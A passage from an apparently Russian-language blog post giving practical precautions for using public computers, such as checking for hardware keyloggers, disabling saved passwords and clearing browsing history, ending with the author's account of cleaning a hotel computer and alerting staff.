Итак, чтобы устроить свою личную «(wiki)leaks» достаточно всего лишь часто пользоваться публичным компьютером в аэропорту, отеле, закусочной, библиотеке или любом другом месте. Если вы вынуждены воспользоваться таким компьютером и обладаете знаниями в области компьютерной безопасности, во-первых, постарайтесь удостовериться, что компьютер не заражен. Помните, что результаты сканирования антивирусом не всегда могут соответствовать реальной картине.

Во-вторых, проверьте, не стоит ли в опциях браузера опция «сохранять пароли».

В-третьих, если вы работаете с документами или фотографиями, постарайтесь их не загружать. Многие современные почтовые сервисы позволяют работать с ними через внутренние встроенные в почту сервисы. Если же вы что-то загрузили, то не забудьте потом это удалить и очистить корзину.

Было бы также хорошо провести внешний осмотр компьютера: чтобы между портом подключения клавиатуры и самой клавиатурой не было устройства, которое занимается сбором информации. Такие устройства могут выглядеть примерно вот так:

В качестве дополнительной предосторожности не забудьте очистить «Историю» посещения веб-страниц или перед использованием интернета воспользуйтесь функцией «Инкогнито», которая доступна во многих современных браузерах.

Итак, я почистил упомянутый выше компьютер и после этого уведомил администратора. Конечно, скидку при оплате отеля мне не дали, но все-таки поблагодарили и заверили, что больше киберпреступники не будут красть деньги их клиентов (сам я в этом совсем не уверен).